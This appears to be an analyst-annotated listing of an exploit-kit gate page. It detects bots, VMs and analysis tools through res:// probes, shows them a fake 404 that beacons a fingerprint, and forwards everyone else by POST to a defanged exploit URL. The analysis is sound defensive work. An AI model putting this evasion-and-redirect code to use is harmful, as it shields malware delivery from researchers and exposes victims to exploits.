<!DOCTYPE html>
<html lang="en">
<head>
<!-- Empty title: nothing on this page is meant to be seen by the visitor; it only fingerprints and forwards. -->
<title></title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<!-- Entry point: once this hidden about:blank frame has loaded, go() runs 99 ms later (note the string form of
     setTimeout, i.e. an implicit eval of 'go()'). Being the first iframe in the document, this frame is later
     addressed as window.frames[0] by finishChecking()/go(), which inject a <form> into it and submit it with
     target="_parent" -- it is the vehicle for the top-level POST to NormalURL. -->
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
- <script>
// Next-stage URL the visitor is POSTed to when no analysis tooling is detected (see finishChecking() and go()).
// The host is defanged in this listing ('[.]' instead of '.'), so the string as written is not a valid URL.
var NormalURL = 'http://try[.]WERREW[.]INFO/?oq=m3Wp_YrLbNVNVDhiECBclBhnYlZW1NHovv9h0jUzR6fhMHQ-UHbUTp1u9CQUbI&q=wXjQMvXcJwDQCobGMvrESLtNNknQA0KK2Iv2_dqyEoH9cmnihNzUSkrx6B2aC';
// Fingerprint string built up by getBrowser() and finishChecking(); it is placed, unencoded, into the query
// string of /log.php when the visitor is classified as a bot or analysis host.
var InfoStr = '';
// appPaths: probe list from genPaths(); foundObjects: names of detected tools/VMs; appsCount/framesLoaded:
// progress counters for the probe iframes. foundAppsCounter is never used; iFrameObject is set in go() but never read.
var appPaths,foundObjects,appsCount,framesLoaded,foundAppsCounter,iFrameObject;
// Prefix of the id/name of each probe iframe ('myFrame0', 'myFrame1', ...).
var iFrameName = 'myFrame';
// When true, deb() echoes to console.log; shipped switched off.
var debug = false;
// Incremented by finishChecking(); go() reads it synchronously right after creating the probe frames.
var isChecked = 0;
// Redeclaration of appPaths (harmless with var). genPaths() is a function declaration and therefore hoisted,
// so calling it here, ahead of its definition in the source, works.
var appPaths = genPaths();
// Builds a browser fingerprint from navigator.userAgent and then cross-checks it against engine-specific
// window/document properties. A desktop UA that claims IE, Chrome or Firefox but is not backed by the matching
// engine internals is flagged as a bot (is_bot). This is the anti-crawler / anti-sandbox gate of the page: a
// fetcher or emulator that only spoofs the User-Agent header fails it. A summary of the probes is appended to the
// global InfoStr (later sent to /log.php). Returns the fingerprint object described below.
function getBrowser() {
var ua = navigator.userAgent;
// browser: what the UA string says; browser_real: what the engine probes say ('' if none matched);
// browser_quality: number of matching probes; platform: 'desktop' or 'mobile'; versionFull/versionShort: parsed from the UA.
var browsrObj = {
browser: 'unknown',
browser_real: '',
is_bot: false,
browser_quality: 0,
platform: 'desktop',
versionFull: '',
versionShort: ''
};
try{
// Substring tests, order-sensitive: Edge and Chromium-based UAs also contain "Chrome" and "Safari",
// so the more specific markers are tested first. "Maxthon" is tested after "Chrome"/"Safari" and is
// therefore unlikely to be reached for a Maxthon UA that also carries those markers.
var bName = function () {
if (ua.search(/Edge/) > -1) return "edge";
if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
if (ua.search(/Firefox/) > -1) return "firefox";
if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
if (ua.search(/YaBrowser/) > -1) return "yabrowser";
if (ua.search(/Chrome/) > -1) return "chrome";
if (ua.search(/Safari/) > -1) return "safari";
if (ua.search(/Maxthon/) > -1) return "maxthon";
else return "unknown";
}();
browsrObj.browser = bName;
// Mobile UAs are never engine-verified (see the condition further down), so they can never be flagged is_bot here.
if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
var version;
if(bName != 'unknown')
{
// Version extraction. If the expected marker is missing, split()[1] is undefined and the later
// version.split(".") throws; the surrounding catch swallows that and versionFull/versionShort stay ''.
switch (bName) {
case "edge":
version = (ua.split("Edge")[1]).split("/")[1];
break;
case "ie":
// IE11 identifies via "Trident/... rv:11.0"; older IE via "MSIE x.y;".
if((ua.search(/Trident/) > -1))
{
version = (ua.split("; rv:")[1]).split(")")[0];
}
else
{
version = (ua.split("MSIE ")[1]).split(";")[0];
}
break;
case "firefox":
version = ua.split("Firefox/")[1];
break;
case "opera":
// Chromium-based Opera ("OPR/") carries no "Version/" marker, so this path throws for it (see above).
version = ua.split("Version/")[1];
break;
// Unreachable: the detector above never returns "operaWebkit".
case "operaWebkit":
bName = "opera";
version = ua.split("OPR/")[1];
break;
case "yabrowser":
version = (ua.split("YaBrowser/")[1]).split(" ")[0];
break;
case "chrome":
version = (ua.split("Chrome/")[1]).split(" ")[0];
break;
case "safari":
version = (ua.split("Version/")[1]).split(" ")[0];
break;
case "maxthon":
version = ua.split("Maxthon/")[1];
break;
}
browsrObj.versionFull = version;
browsrObj.versionShort = version.split(".")[0];
}
// Any parse failure is silently ignored; the fingerprint is just less complete.
} catch (err) {}
var w=window,d=document;
// Assigned but never read.
var CorrectBrowser = true;
var uaBrowser = browsrObj;
// Only isIE is declared with var; the chained assignment makes isChrome, isFirefox and isOpera implicit globals.
var isIE = isChrome = isFirefox = isOpera = 0;
// Engine verification is only attempted for desktop UAs that claim IE, Chrome or Firefox.
if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
{
// Engine-specific globals: ActiveXObject (IE), window.chrome (Chromium), window.opera (Presto-era Opera),
// getBoxObjectFor / mozInnerScreenX (Gecko), WebKit-prefixed APIs (WebKit/Blink).
if('ActiveXObject' in window) isIE++;
if('chrome' in window) isChrome++;
if('opera' in window) isOpera++;
if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
// Bitmask of HTML5-era features; a browser exposing none of them is counted as (old) IE.
var f=0;
f|='sandbox' in d.createElement('iframe')?1:0;
f|='WebSocket' in w?2:0;
f|=w.Worker?4:0;
f|=w.applicationCache?8:0;
f|=w.history && history.pushState?16:0;
f|=d.documentElement.webkitRequestFullScreen?32:0;
f|='FileReader' in w?64:0;
if(f==0) isIE++;
// Decide the "real" engine. Chrome needs isChrome > 1 (the chrome global plus a WebKit API) and no Gecko
// evidence; a browser that satisfies none of the three branches keeps browser_real == ''.
if(isIE > 0)
{
browsrObj.browser_real = 'ie';
browsrObj.browser_quality = isIE;
}
if(isChrome > 1 && isFirefox == 0)
{
browsrObj.browser_real = 'chrome';
browsrObj.browser_quality = isChrome;
}
if(isFirefox > 0 && isChrome == 0)
{
browsrObj.browser_real = 'firefox';
browsrObj.browser_quality = isFirefox;
}
// The gate: UA claim versus engine evidence. Any mismatch -- including browser_real still being '' --
// marks the visitor as a bot. isOpera is computed but never consulted.
if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
}
// Append the UA/engine verdict and the raw probe counts to the global beacon string.
InfoStr += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
return browsrObj;
}
- //////////////////////////////////////////////// THIS LOOKS LIKE WHERE THE NEW_PRE-FILTER_CHECKS STARTS ////////////////////////////////////////////////
// Debug logger gated on the global `debug` flag. Returns false when logging is disabled
// (the caller's value is then dropped); otherwise prints it via console.log and returns undefined.
function deb(msg) {
var enabled = debug;
if (enabled) {
console.log(msg);
return;
}
return false;
}
// Returns the Internet Explorer major.minor version parsed from the user agent, or -1 when the
// browser does not identify as IE. Used by createiFrame(), objectCheckState(), countFrameLoaded() and go()
// to select the IE11-specific code paths. Pre-IE11 reports appName 'Microsoft Internet Explorer' with an
// "MSIE x.y" token; IE11 reports appName 'Netscape' with a "Trident/... rv:x.y" token.
function getInternetExplorerVersion() {
var extract = function (pattern) {
var match = pattern.exec(navigator.userAgent);
return match === null ? -1 : parseFloat(match[1]);
};
var appName = navigator.appName;
if (appName === 'Microsoft Internet Explorer') {
return extract(/MSIE ([0-9]{1,}[.0-9]{0,})/);
}
if (appName === 'Netscape') {
return extract(/Trident\/.*rv:([0-9]{1,}[.0-9]{0,})/);
}
return -1;
}
// Called by go() for each index c of appPaths. Creates a 1x1 iframe whose src is a res:// URL naming a file on the
// visitor's disk (built by genPaths()). res:// is Internet Explorer's resource protocol: it loads a resource out of
// a local PE file, so how the frame's readystatechange/load events fire depends on whether that file exists. That
// file-existence side channel is what the page uses to detect analyst tools and VM guest additions. Other
// mainstream browsers do not implement res://, so outside IE these frames are not expected to yield a useful signal.
function createiFrame(c){
var d=document.createElement('iframe');
// id and name are both 'myFrame' + c (e.g. 'myFrame0'); finishChecking() later removes the frames by id.
d.setAttribute('id',iFrameName+c);
d.setAttribute('name',iFrameName+c);
// 1x1 so the probe frames are effectively invisible.
d.style['width']='1px'
d.style['height']='1px';
// Closures that carry the probe index into the two handlers.
function zrs(){objectCheckState(c);}
function zlo(){countFrameLoaded(c);}
// IE11: handlers are set as inline attribute strings (c is embedded as a string; the array lookup in the
// handlers coerces it back to an index). Elsewhere: addEventListener, with attachEvent as the legacy fallback.
if (getInternetExplorerVersion()==11) {
d.setAttribute('onReadyStateChange',"objectCheckState('"+c+"')");
d.setAttribute('onLoad',"countFrameLoaded('"+c+"')");
} else {
if(d['addEventListener']){
d['addEventListener']('readystatechange',zrs,false);
d['addEventListener']('load',zlo,false);
} else {
if(d['attachEvent']){
d['attachEvent']('on'+'readystatechange',zrs);
d['attachEvent']('on'+'load',zlo);
}
}
}
// Point the frame at the res:// probe URL; attaching it to the document starts the load.
d.setAttribute('src',appPaths[c]['res']);
document.body.appendChild(d);
}
// readystatechange handler for probe frame c (wired up in createiFrame()). Counts state transitions on the
// appPaths[c] entry so that countFrameLoaded() can decide, on load, whether the res:// target existed.
function objectCheckState(c){
// IE11 only: stateIterate counts how many readystatechange events this frame has fired so far.
if (getInternetExplorerVersion()==11) {
if (!appPaths[c]['stateIterate'])
appPaths[c]['stateIterate']=1;
else appPaths[c]['stateIterate']++;
}
// All browsers (IE11 included, so it counts twice): bucket the event under the frame element's current
// readyState string. countFrameLoaded() reads the 'interactive' bucket. Where the iframe element has no
// readyState property this reads undefined and the count lands under the key 'undefined', which nothing consults.
var rs = document.getElementById(iFrameName+c).readyState;
if (!appPaths[c][rs])
appPaths[c][rs]=1;
else appPaths[c][rs]++;
}
// load handler for probe frame c (wired up in createiFrame()). Uses the counters kept by objectCheckState()
// to decide whether the probed file was present, records the hit in foundObjects, and calls finishChecking()
// once every probe frame has reported.
function countFrameLoaded(c){
var _cfl_appName=appPaths[c]['name'];
// Read but not used beyond this line.
var _cfl_appType=appPaths[c]['type'];
// Presence heuristic: the frame passed through readyState 'interactive' more than once, or on IE11 fired exactly
// one readystatechange before load. Which pattern means "file exists" is not stated in the code; it is an
// empirical property of IE's res:// handling. Only the name is recorded, so the two VMware (and two Fiddler2)
// entries can push the same name more than once.
if(appPaths[c]['interactive']>1 || (appPaths[c]['stateIterate']==1 && getInternetExplorerVersion()==11)){
foundObjects.push(_cfl_appName);
} else {
};
framesLoaded++;
// The counter is not tied to distinct frames: an extra or missing load event shifts when, or whether,
// finishChecking() runs.
if (framesLoaded==appsCount) {
finishChecking();
}
}
- // This function is called from within the countFrameLoaded(c) function, and accepts no input.
- function finishChecking() {
- // BrowserInfo contains the browserObj returned from getBrowser().
- BrowserInfo = getBrowser();
- // This variable is initialized as 0 at the beginning of the document.
- isChecked++;
- // This checks for objects found such as: AV, VMs, etc.
- // The operations done on the foundObjects iteration was commented out.
- if (foundObjects.length>0) {
- dopStr = 'VM';
- for (i in foundObjects) {
- //dopStr = dopStr+'_'+foundObjects[i];
- }
- // This is just going to contain "VMVMVMVMVM" for however many found objects there are.
- InfoStr =InfoStr+dopStr;
- }
- // If the browser is a bot or there are several objects found. Print the same string that would be printed for when isChecked is zero.
- if(BrowserInfo.is_bot == true || foundObjects.length>0) {
- document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'" width=10 height=10></iframe></body></html>');
- } else {
- // If this is not a bot, then post the document back as normal (the EK request).
- window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
- }
- // Then call the deleteiFrame('myFrame#') function.
- var b=0;
- for(b=0;b<appsCount;b++){
- deleteiFrame('myFrame'+b);
- }
- }
// Removes the element with id `c` (a 'myFrame#' probe iframe) from its parent. Called by finishChecking()
// for each probe index. Throws if no element with that id exists, since the lookup result is used unchecked.
function deleteiFrame(frameId) {
var frame = document.getElementById(frameId);
var container = frame.parentNode;
container.removeChild(frame);
}
// Builds the probe list used by go()/createiFrame(). Each signature becomes a res:// URL of the form
// res://<local path of an EXE/DLL>/<resource type>/<resource name>; in IE that load behaves differently depending
// on whether the file exists on the visitor's disk, which is how the page detects a debugging proxy, a Flash
// decompiler and VM guest tooling. Returns an array of {name, res, resident, type, filetype} objects, one per probed path.
function genPaths() {
// Base directories. path_sys32 carries no drive letter; it is only used by the 'driver' branch, which has no
// entries. Both Program Files roots are probed so 32- and 64-bit installs are covered.
var path_sys32 = '\\Windows\\System32\\drivers\\',
path_pf = 'C:\\Program Files\\',
path_pfx86 = 'C:\\Program Files (x86)\\';
// Signature table. res = path below Program Files; resident = resource type/name suffix appended to the res://
// URL (the numeric types #24 and #16 correspond to RT_MANIFEST and RT_VERSION on Windows); type is informational
// only -- countFrameLoaded() records a hit by name regardless of type. Fiddler and FFDec are analyst tools; the
// VirtualBox/VMware entries detect guest additions, i.e. a sandboxed VM. The two AV signatures are commented out,
// so antivirus presence is not checked by this version.
var appPath = [
{name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\Fiddler.exe',type:'tool',filetype:'pf'},
{name:'Fiddler2',resident:'/#24/1',res:'Fiddler2\\uninst.exe',type:'tool',filetype:'pf'},
{name:'FFDec',resident:'/#24/1',res:'FFDec\\Uninstall.exe',type:'tool',filetype:'pf'},
/* AV signatures, disabled in this sample:
{name:'NOD32',resident:'/#24/1',res:'ESET\\ESET NOD32 Antivirus\\egui.exe',type:'av',filetype:'pf'},
{name:'Bitdefender',resident:'/#24/1',res:'Bitdefender Agent\\ProductAgentService.exe',type:'av',filetype:'pf'},
*/
{name:'VirtualBox',resident:'/#24/#1',res:'Oracle\\VirtualBox Guest Additions\\uninst.exe', type:'vm',filetype:'pf'},
{name:'VMware',resident:'/#16/#1',res:'VMware\\VMware Tools\\TPAutoConnSvc.exe',type:'vm',filetype:'pf'},
{name:'VMware',resident:'/#24/2',res:'VMware\\VMware Tools\\VMToolsHook.dll',type:'vm',filetype:'pf'}
];
var appPathsCompilled = [];
for(var i=0;i<appPath.length;i++) {
// Driver signatures would be probed under System32\drivers with a '.sys' extension; none are defined above.
if (appPath[i]['filetype']=='driver') {
appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_sys32 + appPath[i]['res'] + '.sys' + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
}
// Every active entry is 'pf': emit one probe under Program Files (x86) and one under Program Files.
if (appPath[i]['filetype']=='pf') {
appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pfx86 + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
appPathsCompilled.push({name:appPath[i]['name'],res:'res://' + path_pf + appPath[i]['res'] + appPath[i]['resident'], resident:appPath[i]['resident'], type:appPath[i]['type'],filetype:appPath[i]['filetype']});
}
}
return appPathsCompilled;
}
// Entry point, invoked 99 ms after the hidden about:blank iframe at the top of the page has loaded. Creates one
// probe iframe per appPaths entry and then -- in the same synchronous run -- decides what to do with the visitor
// on the basis of the user-agent/engine check alone.
function go() {
// Names of detected tools/VMs, filled in by countFrameLoaded().
foundObjects=[];
// Six active signatures in genPaths() times two Program Files roots = twelve probe frames.
appsCount=appPaths.length;
// Number of probe frames whose load event has fired so far.
framesLoaded=0;
// Assigned here but never read anywhere in the visible code.
iFrameObject={};
for(var c=0;c<appsCount;c++) {
// Only logs (and only when debug is on); the frame is created regardless.
if (typeof appPaths[c] == 'undefined') deb('IS UNDEFINED '+c);
createiFrame(c);
}
// load/readystatechange events are delivered asynchronously, so none of the frames can have reported back while
// the loop above was running: isChecked is still 0 here and this branch is, in practice, always taken. The probe
// results therefore only matter if finishChecking() fires before the navigation below completes; the 'NOchecked'
// suffix in the beacon records that the probes had not finished.
if(isChecked == false) {
BrowserInfo = getBrowser();
// UA/engine mismatch: replace the page with a fake Apache 404 whose hidden iframe beacons the (unencoded)
// fingerprint to /log.php with a 'NOchecked' marker.
if(BrowserInfo.is_bot == true) {
document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="/log.php?info='+InfoStr+'NOchecked" width=10 height=10></iframe></body></html>');
}
// Otherwise POST the visitor to NormalURL through a form injected into the hidden frame (window.frames[0]);
// target="_parent" makes it a top-level navigation. The commented-out alternative would have beaconed instead.
else {
window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="'+NormalURL+'"></form>'; window.frames[0].document.forms[0].submit();
//document.write('<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.2.22 (Debian) Server Port 80</address><iframe src="log.php?info='+InfoStr+'NOcheckedNOBOT'+getInternetExplorerVersion()+'" width=10 height=10></iframe></body></html>');
}
}
}
- </script>